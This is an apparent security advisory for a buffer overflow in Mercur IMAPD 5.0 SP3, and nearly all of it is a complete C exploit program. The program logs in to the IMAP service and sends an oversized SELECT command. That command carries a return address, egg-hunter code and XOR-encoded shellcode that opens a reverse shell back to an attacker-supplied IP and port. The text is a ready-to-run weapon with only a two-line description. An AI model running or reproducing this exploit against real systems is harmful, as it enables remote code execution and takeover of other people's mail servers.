Mercur IMAPD Buffer Overflow (Exploit) Summary
A vulnerability in MERCUR's Mail server allows remote attackers to overflow an internal buffer, causing it to execute arbitrary code.
Credit:
The information has been provided by Tang Ellison.
Details
Vulnerable Systems:
* Mercur IMAPD version 5.0 SP3
Exploit:
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout=150000;
if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
{
printf("[-]WSAStartup failed.\n");
exit(-1);
}
if((he=gethostbyname(ip))==0)
{
printf("[-]Failed to resolve '%s'.", ip);
exit(-1);
}
host.sin_port=htons(port);
host.sin_family=AF_INET;
host.sin_addr=*((struct in_addr *)he->h_addr);
if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("[-]Failed creating socket.");
exit(-1);
}
if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
{
closesocket(s);
printf("[-]Failed connecting to host.\n");
exit(-1);
}
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void PrintSc(unsigned char *sc, int len)
{
int i,j;
char *p;
char msg[6];
//printf("/* %d bytes */\n", buffsize);
// Print general shellcode
for(i = 0; i < len; i++)
{
if((i%16)==0)
{
if(i!=0)
printf("\"\n\"");
else
printf("\"");
}
//printf("\\x%.2X", sc[i]);
sprintf(msg, "\\x%.2X", sc[i] & 0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
printf("%c", _tolower(*p));
else
printf("%c", p[0]);
}
}
printf("\";\n");
}
void main(int argc,char* argv[])
{
struct OSTYPE
{
unsigned int ret;
char des[255];
};
OSTYPE os[] = {
{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
{0xDDDDDDDD, "Debug"},
{0, NULL}
};
unsigned char shellcode[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
/* 254 bytes shellcode, xor with 0xee */
"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
"\x84\xec\x11\xb8\xfe\x7d\x86"
"\x91\xee\xee\xef" //ip
"\x86"
"\xec\xee"
"\xee\xdb" //port
"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";
unsigned char FindSc[]=
"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
"\x04\x13\x33\xC0\xC3"
"\x90\x90\x90\x90"
"\xEB\xA5";
if(argc < 5)
{
printf("\n\n\n\n-=[Boboo's Windows Reverse Shell Expoit]=-[TpE-06-05]-\n");
printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
printf("-------------------------------------------\n");
printf("Usage:\n");
printf(" %s <Victim> <Connect back IP> <Connect back Port> <OsType>\n", ar
gv[0]);
printf("\nType could be:\n");
int i=0;
while(os[i].ret)
{
printf(" [%d] %s\n", i, os[i].des);
i++;
}
return;
}
SOCKET s=ConnectTo(argv[1],143);
printf("[+]Connected to target...");
char szRecvBuff[600] = {0};
if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
{
printf("failed!\n");
return;
}
else
{
printf("done!\n");
}
// printf("%s\n",szRecvBuff);
if(strstr(szRecvBuff, "MERCUR") == NULL)
{
printf("[-]Seems not IMAP running.\n");
printf("Quiting...");
return;
}
else
{
printf("[*]Seems IMAP running.\n");
}
unsigned long dwCbIp=inet_addr(argv[2]);
unsigned short q=(unsigned short)atoi(argv[3]);
unsigned short dwCbPort=(unsigned short)q;
dwCbIp=dwCbIp^0xEEEEEEEE;
dwCbPort=dwCbPort^0xEEEE;
shellcode[92] =(char) (dwCbIp & 0x000000FF);
shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);
shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
shellcode[100] =(char) (dwCbPort & 0x000000FF);
char szUserName[20]={0};
printf("[?]Username:");
gets(szUserName);
char szPassWord[20]={0};
printf("[?]Passwd:");
gets(szPassWord);
char szLogin[]=" login ";
char szLoginInfo[50]={0};
unsigned char szSpace=0x20;
char szEnd[]="\r\n";
memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
int dwLen=lstrlen(szUserName);
memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
dwLen+=lstrlen(szLogin);
memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
dwLen+=lstrlen(szPassWord);
memcpy(szLoginInfo+dwLen,&szSpace,1);
dwLen++;
memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
dwLen+=lstrlen(szPassWord);
memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));
// printf("%s\n",szLoginInfo);
printf("[+]Sending Login Info...");
send(s,szLoginInfo,lstrlen(szLoginInfo),0);
if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
{
printf("failed!\n");
return;
}
else
{
printf("done!\n");
}
// printf("%s\n",szRecvBuff);
if(strstr(szRecvBuff, "OK") == NULL)
{
printf("[-]Seems not a valid user or not support IMAP.\n");
printf("Quiting...");
return;
}
else
{
printf("[*]Seems a valid user.\n");
}
char szSelect[]=" select ";
char szMagicData[1000]={0};
memset(szMagicData,'A',sizeof(szMagicData)-1);
memcpy(szMagicData,szUserName,lstrlen(szUserName));
memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);
int p=atoi(argv[4]);
*(unsigned int *)&FindSc[85] = os[p].ret;
memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);
memcpy(szMagicData+251,szEnd,sizeof szEnd-1);
char szAdog[]="AGOU";
memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
memcpy(szMagicData+261,shellcode,sizeof shellcode-1);
memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);
printf("[+]Sending Magic Data To server...Good Luck!\n");
send(s,szMagicData,sizeof szMagicData-1,0);
recv(s,szRecvBuff,sizeof(szRecvBuff),0);
printf("%s\n",szRecvBuff);
Disconnect(s);
printf("[?]Sending finished...Good luck!\n");
}